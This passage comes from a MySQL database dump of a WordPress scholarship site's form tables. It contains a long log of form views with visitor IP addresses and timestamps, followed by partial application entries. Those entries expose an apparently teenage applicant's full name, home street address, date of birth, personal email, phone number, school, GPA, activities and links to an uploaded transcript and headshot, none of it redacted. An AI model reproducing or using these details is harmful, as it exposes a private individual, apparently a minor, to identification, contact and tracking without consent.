01:19:38','141.98.152.208',10),(6025,7,'2021-01-28 01:33:14','66.249.69.211',8),(6026,7,'2021-01-29 08:23:02','66.249.69.211',5),(6027,10,'2021-01-29 09:38:22','66.249.69.212',5),(6028,10,'2021-01-30 10:10:46','3.84.58.14',5),(6029,7,'2021-01-30 10:11:18','3.84.58.14',7),(6030,7,'2021-01-31 12:28:04','17.58.102.55',8),(6031,10,'2021-01-31 14:28:50','51.222.43.122',9),(6032,7,'2021-02-01 13:13:12','95.216.172.172',8),(6033,10,'2021-02-01 15:07:57','13.66.139.38',6),(6034,7,'2021-02-02 16:11:47','35.247.113.5',6),(6035,10,'2021-02-02 20:18:39','13.66.139.38',8),(6036,7,'2021-02-03 16:36:22','206.41.166.20',2),(6037,10,'2021-02-04 12:19:00','17.58.102.55',3),(6038,7,'2021-02-04 22:41:54','54.237.123.90',3),(6039,10,'2021-02-05 19:41:03','104.194.194.56',1),(6040,7,'2021-02-05 23:43:58','198.240.105.148',2),(6041,10,'2021-02-06 22:03:53','96.231.154.240',8),(6042,7,'2021-02-07 03:44:53','68.134.22.18',5),(6043,7,'2021-02-08 05:26:56','173.231.59.201',6),(6044,10,'2021-02-08 05:29:00','173.231.59.201',6),(6045,10,'2021-02-09 07:46:28','54.145.6.77',4),(6046,7,'2021-02-09 07:47:06','54.145.6.77',6),(6047,7,'2021-02-10 12:11:19','69.171.249.23',3),(6048,10,'2021-02-10 15:09:33','52.201.182.91',3),(6049,10,'2021-02-11 15:42:09','174.242.141.210',8),(6050,7,'2021-02-11 21:29:23','198.46.227.159',3),(6051,7,'2021-02-13 07:01:18','107.175.224.137',5),(6052,10,'2021-02-13 07:02:34','107.175.224.137',5),(6053,10,'2021-02-14 13:13:28','54.144.84.151',4),(6054,7,'2021-02-14 13:14:19','54.144.84.151',5),(6055,10,'2021-02-15 15:14:08','45.67.143.201',2),(6056,7,'2021-02-15 15:18:34','168.151.58.214',2),(6057,10,'2021-02-16 22:35:16','73.86.122.168',5),(6058,7,'2021-02-16 22:35:24','73.86.122.168',5),(6059,10,'2021-02-18 01:39:48','54.86.249.23',5),(6060,7,'2021-02-18 01:40:29','54.86.249.23',5),(6061,10,'2021-02-19 02:02:01','13.66.139.47',5),(6062,7,'2021-02-19 06:02:08','23.108.50.51',4),(6063,10,'2021-02-20 16:05:16','54.164.4.58',2),(6064,7,'2021-02-20 16:05:52','54.164.4.58',6),(6065,7,'2021-02-21 18:02:50','40.77.167.39',6),(6066,10,'2021-02-21 18:18:59','96.241.59.102',5),(6067,10,'2021-02-22 19:02:26','71.126.129.65',5),(6068,7,'2021-02-22 19:02:57','71.126.129.65',3),(6069,10,'2021-02-23 19:59:44','73.134.216.141',9),(6070,7,'2021-02-23 20:36:20','96.249.157.68',5),(6071,10,'2021-02-24 22:33:53','68.134.124.93',11),(6072,7,'2021-02-25 00:44:08','73.163.40.127',7),(6073,10,'2021-02-26 03:51:44','130.255.160.137',3),(6074,7,'2021-02-26 03:52:56','130.255.160.137',3),(6075,10,'2021-02-27 04:49:12','3.235.158.175',2),(6076,7,'2021-02-27 04:49:44','3.235.158.175',2),(6077,7,'2021-03-01 23:37:17','73.134.216.141',5),(6078,10,'2021-03-02 06:01:31','107.23.144.46',7),(6079,7,'2021-03-03 03:21:20','100.26.138.186',6),(6080,10,'2021-03-03 12:42:31','103.197.170.15',5),(6081,10,'2021-03-04 20:02:31','198.20.67.202',3),(6082,7,'2021-03-04 20:51:06','100.26.216.177',3),(6083,10,'2021-03-05 20:25:42','71.244.203.100',13),(6084,7,'2021-03-05 20:55:50','73.134.216.141',5),(6085,10,'2021-03-06 21:49:25','107.77.202.124',4),(6086,7,'2021-03-07 10:18:55','54.146.89.27',5),(6087,10,'2021-03-08 01:49:09','172.58.189.62',8),(6088,7,'2021-03-08 15:36:13','35.233.217.238',4),(6089,10,'2021-03-09 04:05:05','3.85.141.174',3),(6090,7,'2021-03-10 01:11:16','52.91.167.194',6),(6091,10,'2021-03-10 15:49:06','52.201.182.91',8),(6092,7,'2021-03-11 08:31:13','196.196.222.117',3),(6093,10,'2021-03-11 20:06:27','184.154.139.3',3),(6094,10,'2021-03-13 02:49:57','108.51.66.225',5),(6095,7,'2021-03-13 07:23:17','223.29.253.176',4),(6096,10,'2021-03-14 08:38:24','54.164.163.133',4),(6097,7,'2021-03-14 08:39:14','54.164.163.133',4),(6098,10,'2021-03-15 19:48:26','151.207.250.32',10),(6099,7,'2021-03-15 20:25:57','223.29.253.206',7),(6100,10,'2021-03-16 21:43:37','40.77.167.4',12),(6101,7,'2021-03-16 23:28:29','100.26.210.174',11),(6102,10,'2021-03-17 22:38:51','13.66.139.13',5),(6103,7,'2021-03-18 20:23:15','3.235.237.101',9),(6104,10,'2021-03-18 22:56:14','68.134.27.154',3),(6105,7,'2021-03-19 20:55:41','167.165.222.52',4),(6106,10,'2021-03-20 01:04:49','69.160.160.51',1),(6107,7,'2021-03-21 02:20:30','71.179.188.146',8),(6108,10,'2021-03-21 10:55:27','52.90.246.217',4),(6109,7,'2021-03-22 05:24:37','69.171.251.4',7),(6110,10,'2021-03-22 17:07:37','45.10.237.155',2),(6111,7,'2021-03-23 05:57:56','34.228.9.25',6),(6112,10,'2021-03-23 18:28:57','72.83.111.19',6),(6113,7,'2021-03-24 12:43:58','107.77.202.77',11),(6114,10,'2021-03-24 23:47:18','3.90.155.89',4),(6115,7,'2021-03-25 21:01:44','34.239.255.25',2),(6116,10,'2021-03-26 17:24:31','54.221.148.52',4),(6117,7,'2021-03-27 07:59:33','66.220.149.9',5),(6118,10,'2021-03-28 01:46:01','34.76.163.90',3),(6119,7,'2021-03-28 10:56:53','18.212.194.8',6),(6120,10,'2021-03-29 08:01:00','54.146.89.27',9),(6121,7,'2021-03-29 18:07:18','17.58.102.65',6),(6122,10,'2021-03-30 17:45:40','13.66.139.58',6),(6123,7,'2021-03-31 01:20:28','54.227.198.98',5),(6124,10,'2021-03-31 21:48:58','35.174.165.9',5),(6125,7,'2021-04-01 16:55:38','35.195.219.102',9),(6126,10,'2021-04-02 01:39:22','87.117.185.175',8),(6127,7,'2021-04-02 22:16:52','66.249.65.85',9),(6128,10,'2021-04-03 02:46:35','176.119.140.179',3),(6129,7,'2021-04-04 00:12:29','157.55.39.247',8),(6130,10,'2021-04-04 08:42:11','18.212.240.232',6),(6131,7,'2021-04-05 06:03:12','3.239.15.218',15),(6132,10,'2021-04-05 10:36:45','51.222.43.124',2),(6133,7,'2021-04-06 15:54:22','34.82.33.237',7),(6134,10,'2021-04-06 18:59:25','17.58.102.65',5),(6135,10,'2021-04-07 19:03:43','184.154.139.18',7),(6136,7,'2021-04-07 20:21:22','3.86.56.95',5),(6137,10,'2021-04-08 19:10:37','184.154.139.20',5),(6138,7,'2021-04-09 02:48:13','50.3.195.149',6),(6139,10,'2021-04-10 01:37:17','91.243.188.68',2),(6140,7,'2021-04-10 04:55:37','73.211.112.123',7),(6141,10,'2021-04-11 07:39:46','54.209.22.169',8),(6142,7,'2021-04-11 07:40:29','54.209.22.169',8),(6143,7,'2021-04-12 12:27:15','66.249.73.129',4),(6144,10,'2021-04-12 13:37:49','207.46.13.110',9),(6145,7,'2021-04-13 17:43:28','66.249.73.155',6),(6146,10,'2021-04-13 22:47:42','54.86.149.41',5),(6147,7,'2021-04-14 19:18:44','3.92.182.218',9),(6148,10,'2021-04-15 08:06:53','207.32.131.236',8),(6149,7,'2021-04-15 22:30:58','91.227.155.56',2),(6150,10,'2021-04-16 12:38:45','34.200.235.234',3),(6151,7,'2021-04-17 00:09:21','207.46.13.41',9),(6152,10,'2021-04-17 13:32:58','207.46.13.110',4),(6153,7,'2021-04-18 07:33:34','98.196.191.154',3),(6154,10,'2021-04-18 14:16:11','73.163.233.100',2),(6155,7,'2021-04-19 08:29:41','3.86.56.95',2),(6156,10,'2021-04-19 16:56:41','66.249.73.132',5),(6157,7,'2021-04-20 12:56:23','216.109.168.55',7),(6158,10,'2021-04-21 02:08:07','18.234.105.188',4),(6159,7,'2021-04-22 10:36:23','185.164.59.54',5),(6160,10,'2021-04-22 10:37:06','185.164.59.54',4),(6161,10,'2021-04-23 13:19:37','207.46.13.51',12),(6162,7,'2021-04-24 02:50:26','31.13.127.26',4),(6163,10,'2021-04-25 02:36:06','66.108.67.43',3),(6164,7,'2021-04-25 07:53:03','17.121.113.47',5),(6165,10,'2021-04-26 06:42:33','54.226.217.223',4),(6166,7,'2021-04-26 18:27:06','98.117.45.101',3),(6167,10,'2021-04-27 18:53:16','64.140.136.128',2),(6168,7,'2021-04-27 18:53:22','94.154.179.51',6),(6169,7,'2021-04-28 19:59:02','66.249.73.132',4),(6170,10,'2021-04-29 00:41:39','66.249.73.132',7),(6171,10,'2021-04-30 01:09:03','54.208.82.21',6),(6172,7,'2021-04-30 01:09:53','54.208.82.21',7),(6173,7,'2021-05-01 17:04:02','66.249.73.153',3),(6174,10,'2021-05-01 17:18:56','207.46.13.51',3),(6175,7,'2021-05-03 03:54:06','114.119.157.110',4),(6176,10,'2021-05-03 17:19:36','40.77.167.71',11),(6177,7,'2021-05-04 08:20:18','66.231.185.74',3),(6178,10,'2021-05-04 20:09:12','152.132.8.131',3),(6179,7,'2021-05-05 10:52:27','114.119.141.146',4),(6180,10,'2021-05-06 03:16:03','17.121.113.58',4),(6181,7,'2021-05-06 13:06:26','100.27.15.49',8),(6182,7,'2021-05-07 19:07:41','184.154.139.18',6),(6183,10,'2021-05-07 22:11:04','167.114.156.50',10),(6184,7,'2021-05-08 20:45:45','114.119.148.105',11),(6185,10,'2021-05-09 02:40:10','107.172.139.252',9),(6186,7,'2021-05-09 21:25:38','63.246.128.172',5),(6187,10,'2021-05-10 03:09:22','18.212.209.52',3),(6188,10,'2021-05-11 03:43:57','34.238.122.105',5),(6189,7,'2021-05-11 03:44:26','34.238.122.105',3),(6190,7,'2021-05-12 18:34:10','114.119.130.104',3),(6191,10,'2021-05-13 12:57:43','216.109.168.79',6),(6192,7,'2021-05-13 20:55:47','114.119.143.145',2),(6193,7,'2021-05-15 01:21:08','72.83.225.114',3),(6194,10,'2021-05-15 01:59:58','71.244.254.236',9),(6195,10,'2021-05-16 04:34:34','18.116.23.72',1),(6196,7,'2021-05-16 04:34:37','18.116.23.72',5),(6197,7,'2021-05-17 17:20:43','139.28.219.154',6),(6198,10,'2021-05-17 19:12:29','184.154.139.17',9),(6199,10,'2021-05-18 20:28:06','157.55.39.3',5),(6200,7,'2021-05-18 20:49:42','77.88.5.54',5),(6201,10,'2021-05-20 02:24:07','72.79.50.66',8),(6202,7,'2021-05-20 02:24:58','72.79.50.66',2),(6203,7,'2021-05-21 05:51:25','107.172.228.144',5),(6204,10,'2021-05-21 05:52:52','107.172.228.144',4),(6205,10,'2021-05-22 10:38:57','54.145.6.39',4),(6206,7,'2021-05-22 10:39:28','54.145.6.39',8),(6207,7,'2021-05-23 19:14:22','184.154.139.19',5),(6208,10,'2021-05-24 00:06:52','73.156.91.233',6),(6209,7,'2021-05-24 21:17:24','17.121.113.104',2),(6210,10,'2021-05-25 14:16:26','108.22.254.28',13),(6211,7,'2021-05-25 22:26:39','107.23.91.208',6),(6212,10,'2021-05-26 14:33:34','100.36.67.81',4),(6213,7,'2021-05-26 23:22:17','195.201.12.243',5),(6214,10,'2021-05-27 19:05:48','17.121.115.110',4),(6215,7,'2021-05-28 12:32:06','54.209.22.169',4),(6216,10,'2021-05-28 23:22:32','173.69.150.59',6),(6217,10,'2021-05-30 06:30:20','35.171.154.65',5),(6218,7,'2021-05-30 06:30:50','35.171.154.65',3),(6219,10,'2021-05-31 22:16:06','168.151.56.33',5),(6220,7,'2021-05-31 22:16:53','104.194.192.220',5),(6221,10,'2021-06-02 02:00:38','54.198.152.194',3),(6222,7,'2021-06-02 02:01:09','54.198.152.194',6),(6223,10,'2021-06-03 14:24:05','173.64.104.200',5),(6224,7,'2021-06-03 21:38:33','3.236.118.151',3),(6225,7,'2021-06-05 01:42:26','40.77.167.101',3),(6226,10,'2021-06-05 01:42:40','157.55.39.3',5),(6227,7,'2021-06-06 03:39:15','40.77.167.101',4),(6228,10,'2021-06-06 03:39:40','157.55.39.3',5),(6229,10,'2021-06-07 09:28:15','54.221.144.232',3),(6230,7,'2021-06-07 09:28:54','54.221.144.232',5),(6231,7,'2021-06-08 09:39:28','165.231.105.214',3),(6232,10,'2021-06-08 09:40:12','165.231.105.214',4),(6233,7,'2021-06-09 14:45:39','66.249.65.89',6),(6234,10,'2021-06-09 15:05:52','167.102.249.82',10),(6235,10,'2021-06-10 19:06:34','184.154.76.35',6),(6236,7,'2021-06-10 21:01:55','54.173.229.88',5),(6237,10,'2021-06-11 20:49:47','73.163.40.127',3),(6238,7,'2021-06-12 05:06:32','40.77.167.101',3),(6239,10,'2021-06-12 21:26:30','157.55.39.29',4),(6240,7,'2021-06-13 10:36:36','34.207.189.71',6),(6241,10,'2021-06-14 00:10:44','157.55.39.29',6),(6242,7,'2021-06-15 00:23:57','191.96.185.251',2),(6243,10,'2021-06-15 04:05:40','54.172.199.118',2),(6244,7,'2021-06-16 01:23:17','34.207.107.85',4),(6245,10,'2021-06-16 06:39:39','157.55.39.29',5),(6246,7,'2021-06-17 10:31:30','23.100.232.233',3),(6247,10,'2021-06-17 14:00:58','151.237.185.141',2),(6248,10,'2021-06-18 16:19:55','149.56.150.8',3),(6249,7,'2021-06-18 16:19:58','149.56.150.8',4),(6250,10,'2021-06-19 22:07:25','34.207.57.183',1),(6251,7,'2021-06-19 22:08:09','34.207.57.183',2),(6252,10,'2021-06-20 22:09:31','67.22.62.6',3),(6253,7,'2021-06-20 22:09:40','104.194.192.175',2),(6254,10,'2021-06-22 05:33:49','18.234.145.247',4),(6255,7,'2021-06-22 05:34:35','18.234.145.247',3),(6256,10,'2021-06-24 19:08:35','184.154.76.35',4),(6257,7,'2021-06-24 19:30:56','54.152.41.115',3),(6258,7,'2021-06-26 03:03:31','5.157.14.27',4),(6259,10,'2021-06-26 03:04:11','5.157.14.27',5),(6260,7,'2021-06-27 06:04:49','157.55.39.20',3),(6261,10,'2021-06-27 10:02:53','100.26.219.39',4),(6262,7,'2021-06-28 10:31:28','103.221.234.164',7),(6263,10,'2021-06-28 13:24:45','40.77.167.24',6),(6264,7,'2021-06-29 10:40:54','135.181.42.188',3),(6265,10,'2021-06-30 02:47:34','3.238.39.44',4),(6266,7,'2021-06-30 20:06:50','72.85.44.163',4),(6267,10,'2021-07-01 06:44:29','66.249.64.247',14),(6268,7,'2021-07-01 23:55:50','71.121.211.25',5),(6269,10,'2021-07-02 14:47:40','209.99.148.89',4),(6270,7,'2021-07-03 13:32:40','18.205.246.62',1),(6271,10,'2021-07-04 13:59:01','100.25.138.157',1),(6272,7,'2021-07-04 13:59:28','100.25.138.157',2),(6273,10,'2021-07-05 17:08:42','69.143.112.224',5),(6274,7,'2021-07-05 19:05:07','184.154.139.17',5),(6275,10,'2021-07-06 19:02:44','184.154.139.17',2),(6276,7,'2021-07-06 19:31:35','66.249.69.216',4),(6277,10,'2021-07-07 20:11:15','40.77.167.19',3),(6278,7,'2021-07-07 22:42:10','66.249.69.214',6),(6279,10,'2021-07-09 01:00:45','3.86.235.140',2),(6280,7,'2021-07-09 01:01:15','3.86.235.140',5),(6281,10,'2021-07-10 01:02:58','3.82.6.225',4),(6282,7,'2021-07-10 01:03:29','3.82.6.225',3),(6283,10,'2021-07-11 03:32:48','3.84.222.8',1),(6284,7,'2021-07-11 03:33:32','3.84.222.8',3),(6285,10,'2021-07-12 20:55:43','3.85.175.130',4),(6286,7,'2021-07-12 20:56:16','3.85.175.130',8),(6287,7,'2021-07-14 22:14:06','52.59.94.113',4),(6288,10,'2021-07-15 11:46:14','34.227.83.189',4),(6289,7,'2021-07-16 07:59:45','3.81.74.188',12),(6290,10,'2021-07-17 05:11:49','34.207.107.85',3),(6291,7,'2021-07-17 17:54:31','151.80.195.102',4),(6292,10,'2021-07-18 16:34:52','149.56.150.16',1),(6293,7,'2021-07-18 19:13:29','66.249.69.223',2),(6294,10,'2021-07-20 04:55:06','198.240.114.250',7),(6295,7,'2021-07-20 04:55:18','45.133.169.111',9),(6296,10,'2021-07-21 22:08:22','3.101.107.91',5),(6297,7,'2021-07-21 22:08:25','3.101.107.91',5),(6298,7,'2021-07-22 23:09:15','165.231.120.194',6),(6299,10,'2021-07-22 23:10:14','165.231.120.194',5),(6300,10,'2021-07-24 02:27:57','3.83.85.242',2),(6301,7,'2021-07-24 02:28:33','3.83.85.242',2),(6302,10,'2021-07-25 07:15:35','3.237.25.68',5),(6303,7,'2021-07-25 07:16:08','3.237.25.68',8),(6304,10,'2021-07-26 08:19:15','5.188.48.58',3),(6305,7,'2021-07-26 14:45:54','207.32.131.3',7),(6306,7,'2021-07-27 14:53:33','157.55.39.111',2),(6307,10,'2021-07-27 19:03:28','184.154.139.18',4),(6308,7,'2021-07-28 16:40:14','52.201.182.91',2),(6309,7,'2021-07-29 18:01:00','174.215.65.70',3),(6310,10,'2021-07-29 18:01:32','174.215.65.70',5),(6311,7,'2021-07-30 23:50:24','118.184.177.55',3),(6312,10,'2021-07-31 04:56:43','71.179.60.97',2),(6313,10,'2021-08-01 23:56:21','100.16.149.126',4),(6314,7,'2021-08-02 05:55:27','45.252.189.98',3),(6315,10,'2021-08-03 06:40:34','66.249.65.180',1),(6316,7,'2021-08-04 11:45:26','207.46.13.161',3),(6317,10,'2021-08-04 15:09:35','162.129.251.23',3),(6318,7,'2021-08-05 13:28:24','66.249.65.180',5),(6319,10,'2021-08-05 16:26:33','3.86.5.209',4),(6320,7,'2021-08-06 15:42:55','18.206.221.61',4),(6321,10,'2021-08-07 13:17:30','52.207.102.6',3),(6322,7,'2021-08-07 19:14:31','184.154.139.18',2),(6323,10,'2021-08-09 09:44:48','54.172.168.76',3),(6324,7,'2021-08-09 09:45:22','54.172.168.76',6),(6325,7,'2021-08-10 10:33:16','17.121.115.156',3),(6326,10,'2021-08-10 17:33:23','35.195.197.130',7),(6327,7,'2021-08-11 16:59:40','52.201.182.91',4),(6328,10,'2021-08-12 02:38:03','35.173.35.144',4),(6329,7,'2021-08-13 00:07:38','18.207.247.163',7),(6330,10,'2021-08-13 07:39:09','5.188.48.58',7),(6331,10,'2021-08-14 09:13:31','185.185.217.76',3),(6332,7,'2021-08-14 09:13:35','185.185.217.76',3),(6333,10,'2021-08-15 17:11:20','52.91.78.196',2),(6334,7,'2021-08-15 17:11:50','52.91.78.196',5),(6335,7,'2021-08-16 18:37:54','207.46.13.160',3),(6336,10,'2021-08-17 00:41:30','45.67.143.106',2),(6337,10,'2021-08-18 08:13:44','3.226.241.233',7),(6338,7,'2021-08-18 08:14:32','3.226.241.233',6),(6339,10,'2021-08-19 12:11:22','149.56.150.243',4),(6340,7,'2021-08-19 12:11:26','149.56.150.243',3),(6341,10,'2021-08-21 00:03:05','73.39.251.199',5),(6342,7,'2021-08-21 01:24:45','18.213.246.205',3),(6343,10,'2021-08-22 03:11:12','18.206.125.78',3),(6344,7,'2021-08-22 03:11:46','18.206.125.78',3),(6345,7,'2021-08-23 11:57:03','5.188.48.10',10),(6346,10,'2021-08-23 20:32:29','198.252.62.196',6),(6347,10,'2021-08-24 20:56:25','168.245.155.3',5),(6348,7,'2021-08-24 21:32:47','3.90.3.143',4),(6349,7,'2021-08-26 02:45:47','162.245.132.146',5),(6350,10,'2021-08-26 12:50:40','52.201.182.91',3),(6351,7,'2021-08-27 10:04:08','66.249.65.116',5),(6352,10,'2021-08-27 15:29:37','52.87.223.38',5),(6353,7,'2021-08-28 13:58:58','151.80.195.102',8),(6354,10,'2021-08-28 18:33:10','46.235.70.142',2),(6355,7,'2021-08-29 18:06:36','207.46.13.160',3),(6356,10,'2021-08-29 19:02:25','184.154.139.20',3),(6357,7,'2021-08-31 02:14:07','107.129.80.190',9),(6358,10,'2021-08-31 14:36:43','3.92.190.59',4),(6359,7,'2021-09-01 03:22:15','207.46.13.160',2),(6360,7,'2021-09-02 06:07:33','206.35.36.2',3),(6361,10,'2021-09-02 10:03:35','34.201.26.52',4),(6362,7,'2021-09-03 06:24:17','3.83.31.138',7),(6363,10,'2021-09-03 16:46:31','198.252.62.73',2),(6364,10,'2021-09-04 21:26:59','69.251.205.161',4),(6365,7,'2021-09-04 22:09:51','54.183.199.126',4),(6366,10,'2021-09-06 03:52:01','3.86.102.194',5),(6367,7,'2021-09-06 03:52:45','3.86.102.194',4),(6368,10,'2021-09-07 08:59:13','3.237.32.211',2),(6369,7,'2021-09-07 08:59:38','3.237.32.211',4),(6370,7,'2021-09-08 09:00:35','107.150.64.87',6),(6371,10,'2021-09-08 09:01:22','107.150.64.87',4),(6372,10,'2021-09-09 16:28:19','207.46.13.27',6),(6373,7,'2021-09-10 00:55:35','35.210.145.160',4),(6374,7,'2021-09-11 06:38:15','207.46.13.59',4),(6375,10,'2021-09-11 11:16:57','3.219.218.250',5),(6376,7,'2021-09-12 07:27:51','44.193.208.154',7),(6377,10,'2021-09-12 12:08:27','207.46.13.142',4),(6378,7,'2021-09-13 08:02:02','66.249.65.110',11),(6379,10,'2021-09-13 15:44:45','168.90.199.122',7),(6380,7,'2021-09-14 11:50:43','184.154.76.35',8),(6381,10,'2021-09-14 18:35:17','107.77.202.151',5),(6382,7,'2021-09-15 15:32:17','66.249.65.110',4),(6383,10,'2021-09-15 20:57:09','165.22.191.158',3),(6384,10,'2021-09-16 23:15:28','184.154.139.19',5),(6385,7,'2021-09-17 01:45:49','35.175.113.71',5),(6386,10,'2021-09-17 23:29:27','196.196.169.40',6),(6387,7,'2021-09-18 03:25:06','207.46.13.175',5),(6388,10,'2021-09-19 09:25:36','93.158.90.79',6),(6389,7,'2021-09-19 09:25:55','93.158.90.79',5),(6390,10,'2021-09-20 13:18:40','44.194.255.212',4),(6391,7,'2021-09-20 13:19:10','44.194.255.212',3),(6392,10,'2021-09-21 15:16:50','172.58.188.142',16),(6393,7,'2021-09-21 15:51:18','5.133.192.173',5),(6394,10,'2021-09-22 16:13:38','93.158.90.75',8),(6395,7,'2021-09-22 16:14:20','93.158.90.75',2);
/*!40000 ALTER TABLE `lwz_rg_form_view` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_rg_incomplete_submissions`
--

DROP TABLE IF EXISTS `lwz_rg_incomplete_submissions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_rg_incomplete_submissions` (
  `uuid` char(32) NOT NULL,
  `email` varchar(255) DEFAULT NULL,
  `form_id` mediumint(8) unsigned NOT NULL,
  `date_created` datetime NOT NULL,
  `ip` varchar(39) NOT NULL,
  `source_url` longtext NOT NULL,
  `submission` longtext NOT NULL,
  PRIMARY KEY (`uuid`),
  KEY `form_id` (`form_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_rg_incomplete_submissions`
--

LOCK TABLES `lwz_rg_incomplete_submissions` WRITE;
/*!40000 ALTER TABLE `lwz_rg_incomplete_submissions` DISABLE KEYS */;
INSERT INTO `lwz_rg_incomplete_submissions` VALUES ('1e08ec48277e4122a77bea0bde78d5bc',NULL,6,'2020-03-30 03:17:07','72.81.137.185','https://zphiblgz.org/scholarship/application/','{\"submitted_values\":{\"3\":\"\",\"18\":{\"18.2\":\"\",\"18.3\":\"Ireoluwa\",\"18.4\":\"\",\"18.6\":\"Omitowoju\",\"18.8\":\"\"},\"19\":{\"19.1\":\"5114 Honey Locust Ct\",\"19.2\":\"\",\"19.3\":\"Ellicott City\",\"19.4\":\"MD\",\"19.5\":\"21042\",\"19.6\":\"United States\",\"19_copy_values_activated\":false},\"4\":\"03-10-02\",\"21\":\"ireomit@gmail.com\",\"20\":\"(443) 801-0749\",\"10\":\"River Hill High School\",\"27\":\"Friend\\/Family Member\",\"28\":\"NA\",\"8\":\"\",\"9\":\"3.83\",\"26\":\"Business or Biology  and pre-med\",\"12\":\"NA\",\"14\":\"\",\"13\":\"\",\"36\":\"\",\"37\":\"\",\"16\":\"\",\"38\":\"\",\"39\":\"\",\"40\":\"\",\"41\":\"\",\"35\":\"\",\"22\":\"\",\"33\":\"\",\"32\":\"\",\"34\":\"\",\"42\":null},\"partial_entry\":{\"id\":null,\"post_id\":null,\"date_created\":null,\"form_id\":6,\"ip\":\"72.81.137.185\",\"source_url\":\"https:\\/\\/zphiblgz.org\\/scholarship\\/application\\/\",\"user_agent\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\",\"created_by\":\"NULL\",\"currency\":\"USD\",\"18.2\":\"\",\"18.3\":\"Ireoluwa\",\"18.4\":\"\",\"18.6\":\"Omitowoju\",\"18.8\":\"\",\"19.1\":\"5114 Honey Locust Ct\",\"19.2\":\"\",\"19.3\":\"Ellicott City\",\"19.4\":\"MD\",\"19.5\":\"21042\",\"19.6\":\"United States\",\"4\":\"03-10-02\",\"21\":\"ireomit@gmail.com\",\"20\":\"(443) 801-0749\",\"10\":\"River Hill High School\",\"27\":\"Friend\\/Family Member\",\"28\":\"NA\",\"9\":\"3.83\",\"26\":\"Business or Biology  and pre-med \",\"12\":\"NA\",\"14\":\"\",\"13\":\"\",\"36\":\"\",\"37\":\"\",\"38\":\"\",\"39\":\"\",\"40\":\"\",\"41\":\"\",\"35\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/Unofficialtranscript.pdf\",\"33\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/ReleaseForm.pdf\",\"34\":\"https:\\/\\/zphiblgz.org\\/wp-content\\/uploads\\/gravity_forms\\/6-84b9c7429a87e5149bf51149a319c9c7\\/2020\\/03\\/IreHeadshot.pdf\"},\"field_values\":\"\",\"page_number\":\"1\",\"files\":[],\"gform_unique_id\":\"5e8164b3c541c\"}'),('b2311b00fe654f5a8cc45fbdc3fa360f',NULL,6,'2020-03-30 02:59:28','72.81.137.185','https://zphiblgz.org/scholarship/application/','{\"submitted_values\":{\"3\":\"\",\"18\":{\"18.2\":\"\",\"18.3\":\"Test\",\"18.4\":\"\",\"18.6\":\"Test\",\"18.8\":\"\"},\"19\":{\"19.1\":\"\",\"19.2\":\"\",\"19.3\":\"\",\"19.4\":\"\",\"19.5\":\"\",\"19.6\":\"United States\",\"19_copy_values_activated\":false},\"4\":\"\",\"21\":\"\",\"20\":\"\",\"10\":\"Atholton High School\",\"27\":\"BSAP Advisor\",\"28\":\"\",\"8\":\"\",\"9\":\"\",\"26\":\"\",\"12\":\"\",\"14\":\"\",\"13\":\"\",\"36\":\"\",\"37\":\"\",\"16\":\"\",\"38\":\"\",\"39\":\"\",\"40\":\"\",\"41\":\"\",\"35\":\"\",\"22\":\"\",\"33\":\"\",\"32\":\"\",\"34\":\"\",\"42\":null},\"partial_entry\":{\"id\":null,\"post_id\":null,\"date_created\":null,\"form_id\":6,\"ip\":\"72.81.137.185\",\"source_url\":\"https:\\/\\/zphiblgz.org\\/scholarship\\/application\\/\",\"user_agent\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\",\"created_by\":\"NULL\",\"currency\":\"USD\",\"18.2\":\"\",\"18.3\":\"Test\",\"18.4\":\"\",\"18.6\":\"Test\",\"18.8\":\"\",\"19.1\":\"\",\"19.2\":\"\",\"19.3\":\"\",\"19.4\":\"\",\"19.5\":\"\",\"19.6\":\"United States\",\"4\":\"\",\"21\":\"\",\"20\":\"\",\"10\":\"Atholton High School\",\"27\":\"BSAP Advisor\",\"28\":\"\",\"9\":\"\",\"26\":\"\",\"12\":\"\",\"14\":\"\",\"13\":\"\",\"36\":\"\",\"37\":\"\",\"38\":\"\",\"39\":\"\",\"40\":\"\",\"41\":\"\",\"35\":\"\",\"33\":\"\",\"34\":\"\"},\"field_values\":\"\",\"page_number\":\"1\",\"files\":[],\"gform_unique_id\":\"5e816090440c3\"}'),('797850215018460c8b5ac8844bd808a3',NULL,6,'2020-03-30 03:29:44','72.81.137.185','https://zphiblgz.org/scholarship/application/','{\"submitted_values\":{\"3\":\"\",\"18\":{\"18.2\":\"\",\"18.3\":\"Ireoluwa\",\"18.4\":\"\",\"18.6\":\"Omitowoju\",\"18.8\":\"\"},\"19\":{\"19.1\":\"5114 Honey Locust Ct\",\"19.2\":\"\",\"19.3\":\"Ellicott City\",\"19.4\":\"MD\",\"19.5\":\"21042\",\"19.6\":\"United States\",\"19_copy_values_activated\":false},\"4\":\"03-10-02\",\"21\":\"ireomit@gmail.com\",\"20\":\"(443) 801-0749\",\"10\":\"River Hill High School\",\"27\":\"Friend\\/Family Member\",\"28\":\"NA\",\"8\":\"\",\"9\":\"3.83\",\"26\":\"Business or Biology  and pre-med\",\"12\":\"NA\",\"14\":\"-Future Business Leaders of America  - \\r\\nExecutive Vice President   June 2019- Present\\r\\nOfficer at Large                      June 2018 - June 2019\\r\\nGeneral Member                    September 2016 - June 2018 \\r\\n\\r\\nAssist CEO\\u2019s with all duties assigned to them\\r\\nPlan and organize workshops \\r\\nMentor underclassman in events\\r\\n\\r\\n-River Hill POMS  - Team Captain        April 2018 - Present\\r\\nGeneral Member  September 2016- April 2018\\r\\n                                          \\r\\nLead to win State Championship\\r\\nCreates 3 pieces of choreography per month\\r\\nLead 